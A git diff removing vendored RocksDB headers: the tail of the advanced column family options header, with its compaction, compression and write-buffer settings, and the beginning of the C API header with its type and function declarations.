-namespace rocksdb {
-
-class Slice;
-class SliceTransform;
-enum CompressionType : unsigned char;
-class TablePropertiesCollectorFactory;
-class TableFactory;
-struct Options;
-
-enum CompactionStyle : char {
-  // level based compaction style
-  kCompactionStyleLevel = 0x0,
-  // Universal compaction style
-  // Not supported in ROCKSDB_LITE.
-  kCompactionStyleUniversal = 0x1,
-  // FIFO compaction style
-  // Not supported in ROCKSDB_LITE
-  kCompactionStyleFIFO = 0x2,
-  // Disable background compaction. Compaction jobs are submitted
-  // via CompactFiles().
-  // Not supported in ROCKSDB_LITE
-  kCompactionStyleNone = 0x3,
-};
-
-// In Level-based compaction, it Determines which file from a level to be
-// picked to merge to the next level. We suggest people try
-// kMinOverlappingRatio first when you tune your database.
-enum CompactionPri : char {
-  // Slightly prioritize larger files by size compensated by #deletes
-  kByCompensatedSize = 0x0,
-  // First compact files whose data's latest update time is oldest.
-  // Try this if you only update some hot keys in small ranges.
-  kOldestLargestSeqFirst = 0x1,
-  // First compact files whose range hasn't been compacted to the next level
-  // for the longest. If your updates are random across the key space,
-  // write amplification is slightly better with this option.
-  kOldestSmallestSeqFirst = 0x2,
-  // First compact files whose ratio between overlapping size in next level
-  // and its size is the smallest. It in many cases can optimize write
-  // amplification.
-  kMinOverlappingRatio = 0x3,
-};
-
-struct CompactionOptionsFIFO {
-  // once the total sum of table files reaches this, we will delete the oldest
-  // table file
-  // Default: 1GB
-  uint64_t max_table_files_size;
-
-  // Drop files older than TTL. TTL based deletion will take precedence over
-  // size based deletion if ttl > 0.
-  // delete if sst_file_creation_time < (current_time - ttl)
-  // unit: seconds. Ex: 1 day = 1 * 24 * 60 * 60
-  // Default: 0 (disabled)
-  uint64_t ttl = 0;
-
-  // If true, try to do compaction to compact smaller files into larger ones.
-  // Minimum files to compact follows options.level0_file_num_compaction_trigger
-  // and compaction won't trigger if average compact bytes per del file is
-  // larger than options.write_buffer_size. This is to protect large files
-  // from being compacted again.
-  // Default: false;
-  bool allow_compaction = false;
-
-  CompactionOptionsFIFO() : max_table_files_size(1 * 1024 * 1024 * 1024) {}
-  CompactionOptionsFIFO(uint64_t _max_table_files_size, bool _allow_compaction,
-                        uint64_t _ttl = 0)
-      : max_table_files_size(_max_table_files_size),
-        ttl(_ttl),
-        allow_compaction(_allow_compaction) {}
-};
-
-// Compression options for different compression algorithms like Zlib
-struct CompressionOptions {
-  int window_bits;
-  int level;
-  int strategy;
-  // Maximum size of dictionary used to prime the compression library. Currently
-  // this dictionary will be constructed by sampling the first output file in a
-  // subcompaction when the target level is bottommost. This dictionary will be
-  // loaded into the compression library before compressing/uncompressing each
-  // data block of subsequent files in the subcompaction. Effectively, this
-  // improves compression ratios when there are repetitions across data blocks.
-  // A value of 0 indicates the feature is disabled.
-  // Default: 0.
-  uint32_t max_dict_bytes;
-
-  CompressionOptions()
-      : window_bits(-14), level(-1), strategy(0), max_dict_bytes(0) {}
-  CompressionOptions(int wbits, int _lev, int _strategy, int _max_dict_bytes)
-      : window_bits(wbits),
-        level(_lev),
-        strategy(_strategy),
-        max_dict_bytes(_max_dict_bytes) {}
-};
-
-enum UpdateStatus {    // Return status For inplace update callback
-  UPDATE_FAILED   = 0, // Nothing to update
-  UPDATED_INPLACE = 1, // Value updated inplace
-  UPDATED         = 2, // No inplace update. Merged value set
-};
-
-
-struct AdvancedColumnFamilyOptions {
-  // The maximum number of write buffers that are built up in memory.
-  // The default and the minimum number is 2, so that when 1 write buffer
-  // is being flushed to storage, new writes can continue to the other
-  // write buffer.
-  // If max_write_buffer_number > 3, writing will be slowed down to
-  // options.delayed_write_rate if we are writing to the last write buffer
-  // allowed.
-  //
-  // Default: 2
-  //
-  // Dynamically changeable through SetOptions() API
-  int max_write_buffer_number = 2;
-
-  // The minimum number of write buffers that will be merged together
-  // before writing to storage.  If set to 1, then
-  // all write buffers are flushed to L0 as individual files and this increases
-  // read amplification because a get request has to check in all of these
-  // files. Also, an in-memory merge may result in writing lesser
-  // data to storage if there are duplicate records in each of these
-  // individual write buffers.  Default: 1
-  int min_write_buffer_number_to_merge = 1;
-
-  // The total maximum number of write buffers to maintain in memory including
-  // copies of buffers that have already been flushed.  Unlike
-  // max_write_buffer_number, this parameter does not affect flushing.
-  // This controls the minimum amount of write history that will be available
-  // in memory for conflict checking when Transactions are used.
-  //
-  // When using an OptimisticTransactionDB:
-  // If this value is too low, some transactions may fail at commit time due
-  // to not being able to determine whether there were any write conflicts.
-  //
-  // When using a TransactionDB:
-  // If Transaction::SetSnapshot is used, TransactionDB will read either
-  // in-memory write buffers or SST files to do write-conflict checking.
-  // Increasing this value can reduce the number of reads to SST files
-  // done for conflict detection.
-  //
-  // Setting this value to 0 will cause write buffers to be freed immediately
-  // after they are flushed.
-  // If this value is set to -1, 'max_write_buffer_number' will be used.
-  //
-  // Default:
-  // If using a TransactionDB/OptimisticTransactionDB, the default value will
-  // be set to the value of 'max_write_buffer_number' if it is not explicitly
-  // set by the user.  Otherwise, the default is 0.
-  int max_write_buffer_number_to_maintain = 0;
-
-  // Allows thread-safe inplace updates. If this is true, there is no way to
-  // achieve point-in-time consistency using snapshot or iterator (assuming
-  // concurrent updates). Hence iterator and multi-get will return results
-  // which are not consistent as of any point-in-time.
-  // If inplace_callback function is not set,
-  //   Put(key, new_value) will update inplace the existing_value iff
-  //   * key exists in current memtable
-  //   * new sizeof(new_value) <= sizeof(existing_value)
-  //   * existing_value for that key is a put i.e. kTypeValue
-  // If inplace_callback function is set, check doc for inplace_callback.
-  // Default: false.
-  bool inplace_update_support = false;
-
-  // Number of locks used for inplace update
-  // Default: 10000, if inplace_update_support = true, else 0.
-  //
-  // Dynamically changeable through SetOptions() API
-  size_t inplace_update_num_locks = 10000;
-
-  // existing_value - pointer to previous value (from both memtable and sst).
-  //                  nullptr if key doesn't exist
-  // existing_value_size - pointer to size of existing_value).
-  //                       nullptr if key doesn't exist
-  // delta_value - Delta value to be merged with the existing_value.
-  //               Stored in transaction logs.
-  // merged_value - Set when delta is applied on the previous value.
-
-  // Applicable only when inplace_update_support is true,
-  // this callback function is called at the time of updating the memtable
-  // as part of a Put operation, lets say Put(key, delta_value). It allows the
-  // 'delta_value' specified as part of the Put operation to be merged with
-  // an 'existing_value' of the key in the database.
-
-  // If the merged value is smaller in size that the 'existing_value',
-  // then this function can update the 'existing_value' buffer inplace and
-  // the corresponding 'existing_value'_size pointer, if it wishes to.
-  // The callback should return UpdateStatus::UPDATED_INPLACE.
-  // In this case. (In this case, the snapshot-semantics of the rocksdb
-  // Iterator is not atomic anymore).
-
-  // If the merged value is larger in size than the 'existing_value' or the
-  // application does not wish to modify the 'existing_value' buffer inplace,
-  // then the merged value should be returned via *merge_value. It is set by
-  // merging the 'existing_value' and the Put 'delta_value'. The callback should
-  // return UpdateStatus::UPDATED in this case. This merged value will be added
-  // to the memtable.
-
-  // If merging fails or the application does not wish to take any action,
-  // then the callback should return UpdateStatus::UPDATE_FAILED.
-
-  // Please remember that the original call from the application is Put(key,
-  // delta_value). So the transaction log (if enabled) will still contain (key,
-  // delta_value). The 'merged_value' is not stored in the transaction log.
-  // Hence the inplace_callback function should be consistent across db reopens.
-
-  // Default: nullptr
-  UpdateStatus (*inplace_callback)(char* existing_value,
-                                   uint32_t* existing_value_size,
-                                   Slice delta_value,
-                                   std::string* merged_value) = nullptr;
-
-  // if prefix_extractor is set and memtable_prefix_bloom_size_ratio is not 0,
-  // create prefix bloom for memtable with the size of
-  // write_buffer_size * memtable_prefix_bloom_size_ratio.
-  // If it is larger than 0.25, it is santinized to 0.25.
-  //
-  // Default: 0 (disable)
-  //
-  // Dynamically changeable through SetOptions() API
-  double memtable_prefix_bloom_size_ratio = 0.0;
-
-  // Page size for huge page for the arena used by the memtable. If <=0, it
-  // won't allocate from huge page but from malloc.
-  // Users are responsible to reserve huge pages for it to be allocated. For
-  // example:
-  //      sysctl -w vm.nr_hugepages=20
-  // See linux doc Documentation/vm/hugetlbpage.txt
-  // If there isn't enough free huge page available, it will fall back to
-  // malloc.
-  //
-  // Dynamically changeable through SetOptions() API
-  size_t memtable_huge_page_size = 0;
-
-  // If non-nullptr, memtable will use the specified function to extract
-  // prefixes for keys, and for each prefix maintain a hint of insert location
-  // to reduce CPU usage for inserting keys with the prefix. Keys out of
-  // domain of the prefix extractor will be insert without using hints.
-  //
-  // Currently only the default skiplist based memtable implements the feature.
-  // All other memtable implementation will ignore the option. It incurs ~250
-  // additional bytes of memory overhead to store a hint for each prefix.
-  // Also concurrent writes (when allow_concurrent_memtable_write is true) will
-  // ignore the option.
-  //
-  // The option is best suited for workloads where keys will likely to insert
-  // to a location close the last inserted key with the same prefix.
-  // One example could be inserting keys of the form (prefix + timestamp),
-  // and keys of the same prefix always comes in with time order. Another
-  // example would be updating the same key over and over again, in which case
-  // the prefix can be the key itself.
-  //
-  // Default: nullptr (disable)
-  std::shared_ptr<const SliceTransform>
-      memtable_insert_with_hint_prefix_extractor = nullptr;
-
-  // Control locality of bloom filter probes to improve cache miss rate.
-  // This option only applies to memtable prefix bloom and plaintable
-  // prefix bloom. It essentially limits every bloom checking to one cache line.
-  // This optimization is turned off when set to 0, and positive number to turn
-  // it on.
-  // Default: 0
-  uint32_t bloom_locality = 0;
-
-  // size of one block in arena memory allocation.
-  // If <= 0, a proper value is automatically calculated (usually 1/8 of
-  // writer_buffer_size, rounded up to a multiple of 4KB).
-  //
-  // There are two additional restriction of the specified size:
-  // (1) size should be in the range of [4096, 2 << 30] and
-  // (2) be the multiple of the CPU word (which helps with the memory
-  // alignment).
-  //
-  // We'll automatically check and adjust the size number to make sure it
-  // conforms to the restrictions.
-  //
-  // Default: 0
-  //
-  // Dynamically changeable through SetOptions() API
-  size_t arena_block_size = 0;
-
-  // Different levels can have different compression policies. There
-  // are cases where most lower levels would like to use quick compression
-  // algorithms while the higher levels (which have more data) use
-  // compression algorithms that have better compression but could
-  // be slower. This array, if non-empty, should have an entry for
-  // each level of the database; these override the value specified in
-  // the previous field 'compression'.
-  //
-  // NOTICE if level_compaction_dynamic_level_bytes=true,
-  // compression_per_level[0] still determines L0, but other elements
-  // of the array are based on base level (the level L0 files are merged
-  // to), and may not match the level users see from info log for metadata.
-  // If L0 files are merged to level-n, then, for i>0, compression_per_level[i]
-  // determines compaction type for level n+i-1.
-  // For example, if we have three 5 levels, and we determine to merge L0
-  // data to L4 (which means L1..L3 will be empty), then the new files go to
-  // L4 uses compression type compression_per_level[1].
-  // If now L0 is merged to L2. Data goes to L2 will be compressed
-  // according to compression_per_level[1], L3 using compression_per_level[2]
-  // and L4 using compression_per_level[3]. Compaction for each level can
-  // change when data grows.
-  std::vector<CompressionType> compression_per_level;
-
-  // Number of levels for this database
-  int num_levels = 7;
-
-  // Soft limit on number of level-0 files. We start slowing down writes at this
-  // point. A value <0 means that no writing slow down will be triggered by
-  // number of files in level-0.
-  //
-  // Default: 20
-  //
-  // Dynamically changeable through SetOptions() API
-  int level0_slowdown_writes_trigger = 20;
-
-  // Maximum number of level-0 files.  We stop writes at this point.
-  //
-  // Default: 36
-  //
-  // Dynamically changeable through SetOptions() API
-  int level0_stop_writes_trigger = 36;
-
-  // Target file size for compaction.
-  // target_file_size_base is per-file size for level-1.
-  // Target file size for level L can be calculated by
-  // target_file_size_base * (target_file_size_multiplier ^ (L-1))
-  // For example, if target_file_size_base is 2MB and
-  // target_file_size_multiplier is 10, then each file on level-1 will
-  // be 2MB, and each file on level 2 will be 20MB,
-  // and each file on level-3 will be 200MB.
-  //
-  // Default: 64MB.
-  //
-  // Dynamically changeable through SetOptions() API
-  uint64_t target_file_size_base = 64 * 1048576;
-
-  // By default target_file_size_multiplier is 1, which means
-  // by default files in different levels will have similar size.
-  //
-  // Dynamically changeable through SetOptions() API
-  int target_file_size_multiplier = 1;
-
-  // If true, RocksDB will pick target size of each level dynamically.
-  // We will pick a base level b >= 1. L0 will be directly merged into level b,
-  // instead of always into level 1. Level 1 to b-1 need to be empty.
-  // We try to pick b and its target size so that
-  // 1. target size is in the range of
-  //   (max_bytes_for_level_base / max_bytes_for_level_multiplier,
-  //    max_bytes_for_level_base]
-  // 2. target size of the last level (level num_levels-1) equals to extra size
-  //    of the level.
-  // At the same time max_bytes_for_level_multiplier and
-  // max_bytes_for_level_multiplier_additional are still satisfied.
-  //
-  // With this option on, from an empty DB, we make last level the base level,
-  // which means merging L0 data into the last level, until it exceeds
-  // max_bytes_for_level_base. And then we make the second last level to be
-  // base level, to start to merge L0 data to second last level, with its
-  // target size to be 1/max_bytes_for_level_multiplier of the last level's
-  // extra size. After the data accumulates more so that we need to move the
-  // base level to the third last one, and so on.
-  //
-  // For example, assume max_bytes_for_level_multiplier=10, num_levels=6,
-  // and max_bytes_for_level_base=10MB.
-  // Target sizes of level 1 to 5 starts with:
-  // [- - - - 10MB]
-  // with base level is level. Target sizes of level 1 to 4 are not applicable
-  // because they will not be used.
-  // Until the size of Level 5 grows to more than 10MB, say 11MB, we make
-  // base target to level 4 and now the targets looks like:
-  // [- - - 1.1MB 11MB]
-  // While data are accumulated, size targets are tuned based on actual data
-  // of level 5. When level 5 has 50MB of data, the target is like:
-  // [- - - 5MB 50MB]
-  // Until level 5's actual size is more than 100MB, say 101MB. Now if we keep
-  // level 4 to be the base level, its target size needs to be 10.1MB, which
-  // doesn't satisfy the target size range. So now we make level 3 the target
-  // size and the target sizes of the levels look like:
-  // [- - 1.01MB 10.1MB 101MB]
-  // In the same way, while level 5 further grows, all levels' targets grow,
-  // like
-  // [- - 5MB 50MB 500MB]
-  // Until level 5 exceeds 1000MB and becomes 1001MB, we make level 2 the
-  // base level and make levels' target sizes like this:
-  // [- 1.001MB 10.01MB 100.1MB 1001MB]
-  // and go on...
-  //
-  // By doing it, we give max_bytes_for_level_multiplier a priority against
-  // max_bytes_for_level_base, for a more predictable LSM tree shape. It is
-  // useful to limit worse case space amplification.
-  //
-  // max_bytes_for_level_multiplier_additional is ignored with this flag on.
-  //
-  // Turning this feature on or off for an existing DB can cause unexpected
-  // LSM tree structure so it's not recommended.
-  //
-  // NOTE: this option is experimental
-  //
-  // Default: false
-  bool level_compaction_dynamic_level_bytes = false;
-
-  // Default: 10.
-  //
-  // Dynamically changeable through SetOptions() API
-  double max_bytes_for_level_multiplier = 10;
-
-  // Different max-size multipliers for different levels.
-  // These are multiplied by max_bytes_for_level_multiplier to arrive
-  // at the max-size of each level.
-  //
-  // Default: 1
-  //
-  // Dynamically changeable through SetOptions() API
-  std::vector<int> max_bytes_for_level_multiplier_additional =
-      std::vector<int>(num_levels, 1);
-
-  // We try to limit number of bytes in one compaction to be lower than this
-  // threshold. But it's not guaranteed.
-  // Value 0 will be sanitized.
-  //
-  // Default: result.target_file_size_base * 25
-  uint64_t max_compaction_bytes = 0;
-
-  // All writes will be slowed down to at least delayed_write_rate if estimated
-  // bytes needed to be compaction exceed this threshold.
-  //
-  // Default: 64GB
-  uint64_t soft_pending_compaction_bytes_limit = 64 * 1073741824ull;
-
-  // All writes are stopped if estimated bytes needed to be compaction exceed
-  // this threshold.
-  //
-  // Default: 256GB
-  uint64_t hard_pending_compaction_bytes_limit = 256 * 1073741824ull;
-
-  // The compaction style. Default: kCompactionStyleLevel
-  CompactionStyle compaction_style = kCompactionStyleLevel;
-
-  // If level compaction_style = kCompactionStyleLevel, for each level,
-  // which files are prioritized to be picked to compact.
-  // Default: kByCompensatedSize
-  CompactionPri compaction_pri = kByCompensatedSize;
-
-  // The options needed to support Universal Style compactions
-  CompactionOptionsUniversal compaction_options_universal;
-
-  // The options for FIFO compaction style
-  CompactionOptionsFIFO compaction_options_fifo;
-
-  // An iteration->Next() sequentially skips over keys with the same
-  // user-key unless this option is set. This number specifies the number
-  // of keys (with the same userkey) that will be sequentially
-  // skipped before a reseek is issued.
-  //
-  // Default: 8
-  //
-  // Dynamically changeable through SetOptions() API
-  uint64_t max_sequential_skip_in_iterations = 8;
-
-  // This is a factory that provides MemTableRep objects.
-  // Default: a factory that provides a skip-list-based implementation of
-  // MemTableRep.
-  std::shared_ptr<MemTableRepFactory> memtable_factory =
-      std::shared_ptr<SkipListFactory>(new SkipListFactory);
-
-  // Block-based table related options are moved to BlockBasedTableOptions.
-  // Related options that were originally here but now moved include:
-  //   no_block_cache
-  //   block_cache
-  //   block_cache_compressed
-  //   block_size
-  //   block_size_deviation
-  //   block_restart_interval
-  //   filter_policy
-  //   whole_key_filtering
-  // If you'd like to customize some of these options, you will need to
-  // use NewBlockBasedTableFactory() to construct a new table factory.
-
-  // This option allows user to collect their own interested statistics of
-  // the tables.
-  // Default: empty vector -- no user-defined statistics collection will be
-  // performed.
-  typedef std::vector<std::shared_ptr<TablePropertiesCollectorFactory>>
-      TablePropertiesCollectorFactories;
-  TablePropertiesCollectorFactories table_properties_collector_factories;
-
-  // Maximum number of successive merge operations on a key in the memtable.
-  //
-  // When a merge operation is added to the memtable and the maximum number of
-  // successive merges is reached, the value of the key will be calculated and
-  // inserted into the memtable instead of the merge operation. This will
-  // ensure that there are never more than max_successive_merges merge
-  // operations in the memtable.
-  //
-  // Default: 0 (disabled)
-  //
-  // Dynamically changeable through SetOptions() API
-  size_t max_successive_merges = 0;
-
-  // This flag specifies that the implementation should optimize the filters
-  // mainly for cases where keys are found rather than also optimize for keys
-  // missed. This would be used in cases where the application knows that
-  // there are very few misses or the performance in the case of misses is not
-  // important.
-  //
-  // For now, this flag allows us to not store filters for the last level i.e
-  // the largest level which contains data of the LSM store. For keys which
-  // are hits, the filters in this level are not useful because we will search
-  // for the data anyway. NOTE: the filters in other levels are still useful
-  // even for key hit because they tell us whether to look in that level or go
-  // to the higher level.
-  //
-  // Default: false
-  bool optimize_filters_for_hits = false;
-
-  // After writing every SST file, reopen it and read all the keys.
-  // Default: false
-  bool paranoid_file_checks = false;
-
-  // In debug mode, RocksDB run consistency checks on the LSM everytime the LSM
-  // change (Flush, Compaction, AddFile). These checks are disabled in release
-  // mode, use this option to enable them in release mode as well.
-  // Default: false
-  bool force_consistency_checks = false;
-
-  // Measure IO stats in compactions and flushes, if true.
-  // Default: false
-  bool report_bg_io_stats = false;
-
-  // Create ColumnFamilyOptions with default values for all fields
-  AdvancedColumnFamilyOptions();
-  // Create ColumnFamilyOptions from Options
-  explicit AdvancedColumnFamilyOptions(const Options& options);
-
-  // ---------------- OPTIONS NOT SUPPORTED ANYMORE ----------------
-
-  // NOT SUPPORTED ANYMORE
-  // This does not do anything anymore.
-  int max_mem_compaction_level;
-
-  // NOT SUPPORTED ANYMORE -- this options is no longer used
-  // Puts are delayed to options.delayed_write_rate when any level has a
-  // compaction score that exceeds soft_rate_limit. This is ignored when == 0.0.
-  //
-  // Default: 0 (disabled)
-  //
-  // Dynamically changeable through SetOptions() API
-  double soft_rate_limit = 0.0;
-
-  // NOT SUPPORTED ANYMORE -- this options is no longer used
-  double hard_rate_limit = 0.0;
-
-  // NOT SUPPORTED ANYMORE -- this options is no longer used
-  unsigned int rate_limit_delay_max_milliseconds = 100;
-
-  // NOT SUPPORTED ANYMORE
-  // Does not have any effect.
-  bool purge_redundant_kvs_while_flush = true;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/c.h b/thirdparty/rocksdb/include/rocksdb/c.h
deleted file mode 100644
index 2269f72..0000000
--- a/thirdparty/rocksdb/include/rocksdb/c.h
+++ /dev/null
@@ -1,1475 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-/* Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-  Use of this source code is governed by a BSD-style license that can be
-  found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-  C bindings for rocksdb.  May be useful as a stable ABI that can be
-  used by programs that keep rocksdb in a shared library, or for
-  a JNI api.
-
-  Does not support:
-  . getters for the option types
-  . custom comparators that implement key shortening
-  . capturing post-write-snapshot
-  . custom iter, db, env, cache implementations using just the C bindings
-
-  Some conventions:
-
-  (1) We expose just opaque struct pointers and functions to clients.
-  This allows us to change internal representations without having to
-  recompile clients.
-
-  (2) For simplicity, there is no equivalent to the Slice type.  Instead,
-  the caller has to pass the pointer and length as separate
-  arguments.
-
-  (3) Errors are represented by a null-terminated c string.  NULL
-  means no error.  All operations that can raise an error are passed
-  a "char** errptr" as the last argument.  One of the following must
-  be true on entry:
-     *errptr == NULL
-     *errptr points to a malloc()ed null-terminated error message
-  On success, a leveldb routine leaves *errptr unchanged.
-  On failure, leveldb frees the old value of *errptr and
-  set *errptr to a malloc()ed error message.
-
-  (4) Bools have the type unsigned char (0 == false; rest == true)
-
-  (5) All of the pointer arguments must be non-NULL.
-*/
-
-#ifndef STORAGE_ROCKSDB_INCLUDE_C_H_
-#define STORAGE_ROCKSDB_INCLUDE_C_H_
-
-#pragma once
-
-#ifdef _WIN32
-#ifdef ROCKSDB_DLL
-#ifdef ROCKSDB_LIBRARY_EXPORTS
-#define ROCKSDB_LIBRARY_API __declspec(dllexport)
-#else
-#define ROCKSDB_LIBRARY_API __declspec(dllimport)
-#endif
-#else
-#define ROCKSDB_LIBRARY_API
-#endif
-#else
-#define ROCKSDB_LIBRARY_API
-#endif
-
-#ifdef __cplusplus
-extern "C" {
-#endif
-
-#include <stdarg.h>
-#include <stddef.h>
-#include <stdint.h>
-
-/* Exported types */
-
-typedef struct rocksdb_t                 rocksdb_t;
-typedef struct rocksdb_backup_engine_t   rocksdb_backup_engine_t;
-typedef struct rocksdb_backup_engine_info_t   rocksdb_backup_engine_info_t;
-typedef struct rocksdb_restore_options_t rocksdb_restore_options_t;
-typedef struct rocksdb_cache_t           rocksdb_cache_t;
-typedef struct rocksdb_compactionfilter_t rocksdb_compactionfilter_t;
-typedef struct rocksdb_compactionfiltercontext_t
-    rocksdb_compactionfiltercontext_t;
-typedef struct rocksdb_compactionfilterfactory_t
-    rocksdb_compactionfilterfactory_t;
-typedef struct rocksdb_comparator_t      rocksdb_comparator_t;
-typedef struct rocksdb_dbpath_t          rocksdb_dbpath_t;
-typedef struct rocksdb_env_t             rocksdb_env_t;
-typedef struct rocksdb_fifo_compaction_options_t rocksdb_fifo_compaction_options_t;
-typedef struct rocksdb_filelock_t        rocksdb_filelock_t;
-typedef struct rocksdb_filterpolicy_t    rocksdb_filterpolicy_t;
-typedef struct rocksdb_flushoptions_t    rocksdb_flushoptions_t;
-typedef struct rocksdb_iterator_t        rocksdb_iterator_t;
-typedef struct rocksdb_logger_t          rocksdb_logger_t;
-typedef struct rocksdb_mergeoperator_t   rocksdb_mergeoperator_t;
-typedef struct rocksdb_options_t         rocksdb_options_t;
-typedef struct rocksdb_compactoptions_t rocksdb_compactoptions_t;
-typedef struct rocksdb_block_based_table_options_t
-    rocksdb_block_based_table_options_t;
-typedef struct rocksdb_cuckoo_table_options_t
-    rocksdb_cuckoo_table_options_t;
-typedef struct rocksdb_randomfile_t      rocksdb_randomfile_t;
-typedef struct rocksdb_readoptions_t     rocksdb_readoptions_t;
-typedef struct rocksdb_seqfile_t         rocksdb_seqfile_t;
-typedef struct rocksdb_slicetransform_t  rocksdb_slicetransform_t;
-typedef struct rocksdb_snapshot_t        rocksdb_snapshot_t;
-typedef struct rocksdb_writablefile_t    rocksdb_writablefile_t;
-typedef struct rocksdb_writebatch_t      rocksdb_writebatch_t;
-typedef struct rocksdb_writebatch_wi_t   rocksdb_writebatch_wi_t;
-typedef struct rocksdb_writeoptions_t    rocksdb_writeoptions_t;
-typedef struct rocksdb_universal_compaction_options_t rocksdb_universal_compaction_options_t;
-typedef struct rocksdb_livefiles_t     rocksdb_livefiles_t;
-typedef struct rocksdb_column_family_handle_t rocksdb_column_family_handle_t;
-typedef struct rocksdb_envoptions_t      rocksdb_envoptions_t;
-typedef struct rocksdb_ingestexternalfileoptions_t rocksdb_ingestexternalfileoptions_t;
-typedef struct rocksdb_sstfilewriter_t   rocksdb_sstfilewriter_t;
-typedef struct rocksdb_ratelimiter_t     rocksdb_ratelimiter_t;
-typedef struct rocksdb_pinnableslice_t rocksdb_pinnableslice_t;
-typedef struct rocksdb_transactiondb_options_t rocksdb_transactiondb_options_t;
-typedef struct rocksdb_transactiondb_t rocksdb_transactiondb_t;
-typedef struct rocksdb_transaction_options_t rocksdb_transaction_options_t;
-typedef struct rocksdb_optimistictransactiondb_t rocksdb_optimistictransactiondb_t;
-typedef struct rocksdb_optimistictransaction_options_t rocksdb_optimistictransaction_options_t;
-typedef struct rocksdb_transaction_t rocksdb_transaction_t;
-typedef struct rocksdb_checkpoint_t rocksdb_checkpoint_t;
-
-/* DB operations */
-
-extern ROCKSDB_LIBRARY_API rocksdb_t* rocksdb_open(
-    const rocksdb_options_t* options, const char* name, char** errptr);
-
-extern ROCKSDB_LIBRARY_API rocksdb_t* rocksdb_open_for_read_only(
-    const rocksdb_options_t* options, const char* name,
-    unsigned char error_if_log_file_exist, char** errptr);
-
-extern ROCKSDB_LIBRARY_API rocksdb_backup_engine_t* rocksdb_backup_engine_open(
-    const rocksdb_options_t* options, const char* path, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_backup_engine_create_new_backup(
-    rocksdb_backup_engine_t* be, rocksdb_t* db, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_backup_engine_purge_old_backups(
-    rocksdb_backup_engine_t* be, uint32_t num_backups_to_keep, char** errptr);
-
-extern ROCKSDB_LIBRARY_API rocksdb_restore_options_t*
-rocksdb_restore_options_create();
-extern ROCKSDB_LIBRARY_API void rocksdb_restore_options_destroy(
-    rocksdb_restore_options_t* opt);
-extern ROCKSDB_LIBRARY_API void rocksdb_restore_options_set_keep_log_files(
-    rocksdb_restore_options_t* opt, int v);
-
-extern ROCKSDB_LIBRARY_API void
-rocksdb_backup_engine_restore_db_from_latest_backup(
-    rocksdb_backup_engine_t* be, const char* db_dir, const char* wal_dir,
-    const rocksdb_restore_options_t* restore_options, char** errptr);
-
-extern ROCKSDB_LIBRARY_API const rocksdb_backup_engine_info_t*
-rocksdb_backup_engine_get_backup_info(rocksdb_backup_engine_t* be);
-
-extern ROCKSDB_LIBRARY_API int rocksdb_backup_engine_info_count(
-    const rocksdb_backup_engine_info_t* info);
-
-extern ROCKSDB_LIBRARY_API int64_t
-rocksdb_backup_engine_info_timestamp(const rocksdb_backup_engine_info_t* info,
-                                     int index);
-
-extern ROCKSDB_LIBRARY_API uint32_t
-rocksdb_backup_engine_info_backup_id(const rocksdb_backup_engine_info_t* info,
-                                     int index);
-
-extern ROCKSDB_LIBRARY_API uint64_t
-rocksdb_backup_engine_info_size(const rocksdb_backup_engine_info_t* info,
-                                int index);
-
-extern ROCKSDB_LIBRARY_API uint32_t rocksdb_backup_engine_info_number_files(
-    const rocksdb_backup_engine_info_t* info, int index);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_backup_engine_info_destroy(
-    const rocksdb_backup_engine_info_t* info);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_backup_engine_close(
-    rocksdb_backup_engine_t* be);
-
-extern ROCKSDB_LIBRARY_API rocksdb_checkpoint_t*
-rocksdb_checkpoint_object_create(rocksdb_t* db, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_checkpoint_create(
-    rocksdb_checkpoint_t* checkpoint, const char* checkpoint_dir,
-    uint64_t log_size_for_flush, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_checkpoint_object_destroy(
-    rocksdb_checkpoint_t* checkpoint);
-
-extern ROCKSDB_LIBRARY_API rocksdb_t* rocksdb_open_column_families(
-    const rocksdb_options_t* options, const char* name, int num_column_families,
-    const char** column_family_names,
-    const rocksdb_options_t** column_family_options,
-    rocksdb_column_family_handle_t** column_family_handles, char** errptr);
-
-extern ROCKSDB_LIBRARY_API rocksdb_t*
-rocksdb_open_for_read_only_column_families(
-    const rocksdb_options_t* options, const char* name, int num_column_families,
-    const char** column_family_names,
-    const rocksdb_options_t** column_family_options,
-    rocksdb_column_family_handle_t** column_family_handles,
-    unsigned char error_if_log_file_exist, char** errptr);
-
-extern ROCKSDB_LIBRARY_API char** rocksdb_list_column_families(
-    const rocksdb_options_t* options, const char* name, size_t* lencf,
-    char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_list_column_families_destroy(
-    char** list, size_t len);
-
-extern ROCKSDB_LIBRARY_API rocksdb_column_family_handle_t*
-rocksdb_create_column_family(rocksdb_t* db,
-                             const rocksdb_options_t* column_family_options,
-                             const char* column_family_name, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_drop_column_family(
-    rocksdb_t* db, rocksdb_column_family_handle_t* handle, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_column_family_handle_destroy(
-    rocksdb_column_family_handle_t*);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_close(rocksdb_t* db);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_put(
-    rocksdb_t* db, const rocksdb_writeoptions_t* options, const char* key,
-    size_t keylen, const char* val, size_t vallen, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_put_cf(
-    rocksdb_t* db, const rocksdb_writeoptions_t* options,
-    rocksdb_column_family_handle_t* column_family, const char* key,
-    size_t keylen, const char* val, size_t vallen, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_delete(
-    rocksdb_t* db, const rocksdb_writeoptions_t* options, const char* key,
-    size_t keylen, char** errptr);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_delete_cf(
-    rocksdb_t* db, const rocksdb_writeoptions_t* options,
-    rocksdb_column_family_handle_t* column_family, const char* key,
-    size_t keylen, char** errptr);
-
